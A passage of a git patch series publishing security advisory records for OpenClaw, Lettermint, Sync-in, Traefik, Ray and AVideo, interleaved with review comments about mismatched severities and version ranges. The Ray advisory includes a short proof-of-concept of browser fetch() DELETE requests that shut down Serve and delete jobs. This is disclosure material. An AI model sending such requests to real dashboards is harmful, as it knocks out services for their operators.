`775816035ecc6bb243843f8000c9a58ff609e32d`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.18" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wh94-p5m6-mr7j" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/775816035ecc6bb243843f8000c9a58ff609e32d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": 
"https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:02:31Z", + "nvd_published_at": null + } +} \ No newline at end of file From 4892a038f0ee27842948b4583640b54736f1fbb9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:07:50 +0000 Subject: [PATCH 21/77] Publish GHSA-r6h2-5gqq-v5v6 --- .../GHSA-r6h2-5gqq-v5v6.json | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json diff --git a/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json new file mode 100644 index 0000000000000..82b927d19e9a8 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json 
@@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6h2-5gqq-v5v6", + "modified": "2026-02-20T21:05:45Z", + "published": "2026-02-20T21:05:45Z", + "aliases": [ + "CVE-2026-27485" + ], + "summary": "OpenClaw: Reject symlinks in local skill packaging script", + "details": "## Vulnerability\n\n`skills/skill-creator/scripts/package_skill.py` (a local helper script used when authors package skills) previously followed symlinks while building `.skill` archives.\n\nIf an author runs this script on a crafted local skill directory containing symlinks to files outside the skill root, the resulting archive can include unintended file contents.\n\n## Severity and Exposure\n\n- **Severity: Low**\n- **Execution context:** local/manual workflow only (skill author packaging step)\n- **No remote trigger:** this is not reachable via normal OpenClaw gateway/chat runtime paths\n- **No extraction Zip Slip in this finding:** this issue is limited to packaging-time symlink following\n\n## Impact\n\n- Potential unintentional disclosure of local files from the packaging machine into a generated `.skill` artifact.\n- Requires local execution of the packaging script on attacker-controlled skill contents.\n\n## Affected Components\n\n- `skills/skill-creator/scripts/package_skill.py`\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Latest published version during triage: `2026.2.17`\n- Vulnerable version range: `<= 2026.2.17`\n- Planned patched version (next release): `2026.2.18`\n\n## Remediation\n\n- Reject symlinks during skill packaging.\n- Add regression tests for symlink file and symlink directory cases.\n- Update packaging guidance to document the symlink restriction.\n\n## Fix Commit(s)\n\n- `c275932aa4230fb7a8212fe1b9d2a18424874b3f`\n- `ee1d6427b544ccadd73e02b1630ea5c29ba9a9f0`\n\n## Related PR\n\n- https://github.com/openclaw/openclaw/pull/20796\n\n## Release Process Note\n\n`patched_versions` is pre-set to the planned next release (`2026.2.18`). 
Once npm `openclaw@2026.2.18` is published, this advisory is ready to publish without additional edits.\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.18" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6h2-5gqq-v5v6" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/20796" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/c275932aa4230fb7a8212fe1b9d2a18424874b3f" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/ee1d6427b544ccadd73e02b1630ea5c29ba9a9f0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-61" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:05:45Z", + "nvd_published_at": null + } +} \ No newline at end of file From ef3ccde7aff8ff9e8ded5d57c650218edae6738c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:14:35 +0000 Subject: [PATCH 22/77] Publish GHSA-w45g-5746-x9fp --- .../GHSA-w45g-5746-x9fp.json | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json 
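Review bot: The scored fields of this new GHSA-r6h2-5gqq-v5v6 record disagree with its own `details` text. The prose says "Severity: Low", vulnerable `<= 2026.2.17` and patched in `2026.2.18`, while the record carries `"severity": "MODERATE"`, `"fixed": "2026.2.19"` and `"last_known_affected_version_range": "<= 2026.2.18"`. The CVSS v4 vector also sets `VC:N/VI:L`, although the described impact is local file contents ending up in the generated archive, which reads as a confidentiality effect; `VC:L` would be the expected metric if the description is accurate. Scanners and triage tooling read `affected[].ranges` and the vector rather than the prose, so the two should be reconciled against the release that actually contains the fix commits. The GHSA-wh94-p5m6-mr7j record added earlier in this series has a related mismatch: `"fixed": "2026.2.18"` with a release reference pointing at `v2026.2.19`.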
diff --git a/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json new file mode 100644 index 0000000000000..6ea03cb2a2cf4 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json 
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w45g-5746-x9fp", + "modified": "2026-02-20T21:13:03Z", + "published": "2026-02-20T21:13:03Z", + "aliases": [ + "CVE-2026-27488" + ], + "summary": "OpenClaw hardened cron webhook delivery against SSRF", + "details": "## Affected Packages / Versions\n\n- `openclaw` npm package versions `<= 2026.2.17`.\n\n## Vulnerability\nCron webhook delivery in `src/gateway/server-cron.ts` used `fetch()` directly, so webhook targets could reach private/metadata/internal endpoints without SSRF policy checks.\n\n## Fix Commit(s)\n- `99db4d13e`\n- `35851cdaf`\n\nThanks @Adam55A-code for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.17" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w45g-5746-x9fp" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/99db4d13e5c139883ef0def9ff963e9273179655" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.19" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:13:03Z", + "nvd_published_at": null + } +} \ No newline at end of file From caae1cc53857d7e39c160f58164e7cf7450a9def Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:16:57 +0000 Subject: [PATCH 23/77] Publish Advisories GHSA-49pc-8936-wvfp GHSA-9jmq-xgjm-p8c2 GHSA-gv8r-9rw9-9697 GHSA-q5fh-2hc8-f6rq GHSA-rcqw-6466-3mv7 GHSA-9jmq-xgjm-p8c2 --- .../GHSA-49pc-8936-wvfp.json | 65 ++++++++++++ .../GHSA-9jmq-xgjm-p8c2.json | 69 +++++++++++++ .../GHSA-gv8r-9rw9-9697.json | 99 +++++++++++++++++++ .../GHSA-q5fh-2hc8-f6rq.json | 69 +++++++++++++ .../GHSA-rcqw-6466-3mv7.json | 65 ++++++++++++ .../GHSA-9jmq-xgjm-p8c2.json | 33 ------- 6 files changed, 367 insertions(+), 33 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json new file mode 100644 index 0000000000000..2fed98112dc02 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json 
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-49pc-8936-wvfp",
+ "modified": "2026-02-20T21:14:50Z",
+ "published": "2026-02-20T21:14:49Z",
+ "aliases": [
+ "CVE-2026-27492"
+ ],
+ "summary": "Lettermint Node.js SDK leaks email properties to unintended recipients when client instance is reused",
+ "details": "### Impact\nEmail properties (such as to, subject, html, text, and attachments) are not reset between sends when a single client instance is reused across multiple .send() calls. This can cause properties from a previous send to leak into a subsequent one, potentially delivering content or recipient addresses to unintended parties. Applications sending emails to different recipients in sequence — such as transactional flows like password resets or notifications — are affected.\n\n### Patches\nYes, the issue has been patched. Users should upgrade to v1.5.1 or later.\n\n### Workarounds\nIf upgrading immediately is not possible, instantiate a new client for each send:\n```js\nconst client = new Lettermint({ apiKey: process.env.LETTERMINT_API_KEY });\nawait client.email.to('...').subject('...').html('...').send();\n```\n\nThis ensures no state is carried over between sends.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "lettermint"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.5.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/lettermint/lettermint-node"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lettermint/lettermint-node/blob/main/CHANGELOG.md#151-2026-02-20"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-488"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T21:14:49Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json b/advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json
new file mode 100644
index 0000000000000..d684b5c64310b
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9jmq-xgjm-p8c2",
+ "modified": "2026-02-20T21:15:36Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2025-67438"
+ ],
+ "summary": "Sync-in Server has a stored cross-site scripting (XSS) vulnerability",
+ "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Sync-in Server before 1.9.3 allows an authenticated attacker to execute arbitrary JavaScript in a victim's browser. By uploading a crafted SVG file containing a malicious payload, an attacker can access and exfiltrate sensitive information, including the user's session cookies.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "@sync-in/server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.9.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67438"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Sync-in/server/commit/a6276d067725637310e4e83a3eee337aae81f439"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/Sync-in/server"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Sync-in/server/releases/tag/v1.9.3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T21:15:36Z",
+ "nvd_published_at": "2026-02-20T16:22:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json b/advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json
new file mode 100644
index 0000000000000..738d3df51f1c8
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-gv8r-9rw9-9697/GHSA-gv8r-9rw9-9697.json 
@@ -0,0 +1,99 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gv8r-9rw9-9697",
+ "modified": "2026-02-20T21:14:27Z",
+ "published": "2026-02-20T21:14:27Z",
+ "aliases": [],
+ "summary": "Traefik affected by TLS ClientAuth Bypass on HTTP/3",
+ "details": "### Summary\n\nThere is a potential vulnerability in Traefik managing HTTP/3 connections.\n\nMore details in the [CVE-2025-68121](https://nvd.nist.gov/vuln/detail/CVE-2025-68121).\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.37\n- https://github.com/traefik/traefik/releases/tag/v3.6.8\n\n## Workarounds\n\nNo workaround\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/traefik/traefik"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.7.34"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/traefik/traefik/v2"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.11.37"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2.11.36"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/traefik/traefik/v3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.6.8"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 3.6.7"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/traefik/traefik/security/advisories/GHSA-gv8r-9rw9-9697"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/traefik/traefik"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1395"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T21:14:27Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json
new file mode 100644
index 0000000000000..0ee743fdace27
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json
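Review bot: The first `affected` entry marks every `github.com/traefik/traefik` release up to `1.7.34` as vulnerable through `last_affected`, yet `details` only describes HTTP/3 connection handling and lists patches for v2.11.37 and v3.6.8; nothing in the advisory says the v1 module is affected, so that range should be confirmed against upstream before it ships. As written, dependency scanners will report a CRITICAL finding for v1 users with no fixed version to move to. The two release URLs under "Patches" and the NVD link for CVE-2025-68121 also exist only inside the Markdown `details`; adding them to `references` (as `WEB` and `ADVISORY` entries) makes the remediation machine-readable. `aliases` being empty looks deliberate given `CWE-1395`, since the CVE appears to belong to a dependency, but that reasoning is not stated anywhere in the record.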
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q5fh-2hc8-f6rq",
+ "modified": "2026-02-20T21:15:26Z",
+ "published": "2026-02-20T21:15:25Z",
+ "aliases": [
+ "CVE-2026-27482"
+ ],
+ "summary": "Ray dashboard DELETE endpoints allow unauthenticated browser-triggered DoS (Serve shutdown / job deletion)",
+ "details": "### Summary\n\n Ray’s dashboard HTTP server blocks browser-origin POST/PUT but does not cover DELETE, and key DELETE endpoints are unauthenticated by default. If the dashboard/agent is reachable (e.g., --dashboard-host=0.0.0.0), a web page via DNS rebinding or same-network access can\n issue DELETE requests that shut down Serve or delete jobs without user interaction. This is a drive-by availability impact.\n\n ### Details\n\n - Middleware: python/ray/dashboard/http_server_head.py#get_browsers_no_post_put_middleware only checks POST/PUT via is_browser_request (UA/Origin/Sec-Fetch heuristics). DELETE is not gated.\n - Endpoints lacking browser protection/auth by default:\n - python/ray/dashboard/modules/serve/serve_head.py: @routes.delete(\"/api/serve/applications/\") calls serve.shutdown().\n - python/ray/dashboard/modules/job/job_head.py: @routes.delete(\"/api/jobs/{job_or_submission_id}\").\n - python/ray/dashboard/modules/job/job_agent.py: @routes.delete(\"/api/job_agent/jobs/{job_or_submission_id}\") (not wrapped with deny_browser_requests either).\n - Dashboard token auth is optional and off by default; binding to 0.0.0.0 is common for remote access.\n\n ### PoC\n\n Prereqs: dashboard reachable (e.g., ray start --head --dashboard-host=0.0.0.0), no token auth.\n\n 1. Start Serve (or have jobs present).\n 2. From any browser-reachable origin (DNS rebinding or same-LAN page), issue a DELETE fetch:\n\n``` \nfetch(\"http://:8265/api/serve/applications/\", {\n method: \"DELETE\",\n headers: { \"User-Agent\": \"Mozilla/5.0\" } // browsers set this automatically\n });\n```\n\n Result: Serve shuts down.\n 3) Similarly, delete jobs:\n\n ` fetch(\"http://:8265/api/jobs/\", { method: \"DELETE\" });`\n ` fetch(\"http://:52365/api/job_agent/jobs/\", { method: \"DELETE\" });`\n\n Browsers will send the Mozilla UA and Origin/Sec-Fetch headers, but DELETE is not blocked by the middleware, so the requests succeed.\n\n ### Impact\n\n - Availability loss: Serve shutdown; job deletion. Triggerable via drive-by browser requests if the dashboard/agent ports are reachable and auth is disabled (default).\n - No code execution from this vector, but breaks isolation/trust assumptions for “developer-only” endpoints.\n \n### Fix\nThe fix for this vulnerability is to update to Ray 2.54.0 or higher. \n\nFix PR: https://github.com/ray-project/ray/pull/60526",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "ray"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.54.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/ray-project/ray/security/advisories/GHSA-q5fh-2hc8-f6rq"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ray-project/ray/pull/60526"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ray-project/ray/commit/0fda8b824cdc9dc6edd763bb28dfd7d1cc9b02a4"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ray-project/ray"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ray-project/ray/releases/tag/ray-2.54.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T21:15:25Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json b/advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json
new file mode 100644
index 0000000000000..6119066e10708
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-rcqw-6466-3mv7/GHSA-rcqw-6466-3mv7.json
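Review bot: The `details` text has no Workarounds section, although it names the two conditions that make the endpoints reachable: dashboard token auth being off by default and binding with `--dashboard-host=0.0.0.0`. Operators who cannot move to 2.54.0 right away need a short section telling them to enable dashboard token authentication and to keep the dashboard and job-agent ports off non-loopback interfaces until they upgrade. The request URLs in the text also appear to have lost their placeholders (`http://:8265/...` has no host and `/api/jobs/` no id), most likely angle-bracket tokens stripped during rendering, so they should be restored in an escaped form. `cwe_ids` lists only `CWE-306`; because the described trigger is a cross-origin browser request, `CWE-352` may also apply, which is the advisory reviewer's call.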
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rcqw-6466-3mv7",
+ "modified": "2026-02-20T21:15:06Z",
+ "published": "2026-02-20T21:15:06Z",
+ "aliases": [
+ "CVE-2026-27568"
+ ],
+ "summary": "AVideo has Stored Cross-Site Scripting via Markdown Comment Injection",
+ "details": "## Vulnerability Type\nStored Cross-Site Scripting (XSS) — CWE-79.\n\n## Affected Product/Versions\nAVideo 18.0.\n\n## Root Cause Summary\nAVideo allows Markdown in video comments and uses Parsedown (v1.7.4) without Safe Mode enabled. Markdown links are not sufficiently sanitized, allowing `javascript:` URIs to be rendered as clickable links.\n\n## Impact Summary\nAn authenticated low-privilege attacker can post a malicious comment that injects persistent JavaScript. When another user clicks the link, the attacker can perform actions such as session hijacking, privilege escalation (including admin takeover), and data exfiltration.\n\n## Resolution/Fix\nThe issue was confirmed and fixed in the master branch. An official release will be published soon.\n\n## Workarounds\nUntil the release is available, validate and block unsafe URI schemes (e.g., `javascript:`) before rendering Markdown, and enable Parsedown Safe Mode.\n\n## Credits/Acknowledgement\nReported by Arkadiusz Marta (https://github.com/arkmarta/).",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "wwbn/avideo"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "21.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rcqw-6466-3mv7"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/WWBN/AVideo/commit/ade348ed6d28b3797162c3d9e98054fb09ec51d7"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/WWBN/AVideo"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/WWBN/AVideo/releases/tag/21.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T21:15:06Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json b/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json
deleted file mode 100644
index e7ae460c93780..0000000000000
--- a/advisories/unreviewed/2026/02/GHSA-9jmq-xgjm-p8c2/GHSA-9jmq-xgjm-p8c2.json
+++ /dev/null
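Review bot: The prose in `details` contradicts the structured fields of the same record: it gives the affected version as "AVideo 18.0" and says the fix is only on master with "An official release will be published soon", while `affected` declares `introduced: 0` / `fixed: 21.0` and `references` links the 21.0 release tag. Readers who act on the text will not learn that a fixed release exists, and readers who act on the range will treat every version before 21.0 as vulnerable, which the text does not claim. The Resolution paragraph should be updated to something like `The issue is fixed in release 21.0.`, and the affected-versions line reconciled with the range (or the range narrowed if only 18.0 is affected). The Workarounds paragraph is still useful for users who cannot upgrade, but its opening "Until the release is available" is stale for the same reason.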
@@ -1,33 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9jmq-xgjm-p8c2",
- "modified": "2026-02-20T18:31:33Z",
- "published": "2026-02-20T18:31:33Z",
- "aliases": [
- "CVE-2025-67438"
- ],
- "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Sync-in Server before 1.9.3 allows an authenticated attacker to execute arbitrary JavaScript in a victim's browser. By uploading a crafted SVG file containing a malicious payload, an attacker can access and exfiltrate sensitive information, including the user's session cookies.",
- "severity": [],
- "affected": [],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67438"
- },
- {
- "type": "WEB",
- "url": "https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad"
- },
- {
- "type": "WEB",
- "url": "https://github.com/Sync-in/server/releases/tag/v1.9.3"
- }
- ],
- "database_specific": {
- "cwe_ids": [],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2026-02-20T16:22:02Z"
- }
-}
\ No newline at end of file
From 15ca7925626eaa5195a38a82f516657e3fe1a541 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:20:36 +0000 Subject: [PATCH 24/77] Publish GHSA-378v-28hj-76wf --- .../GHSA-378v-28hj-76wf.json | 39 ++++++++++++++++--- 1 file changed, 34 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json (67%)
diff --git a/advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json
similarity index 67%
rename from advisories/unreviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json
rename to advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json
index b195f365c2995..a03ceb51fe956 100644
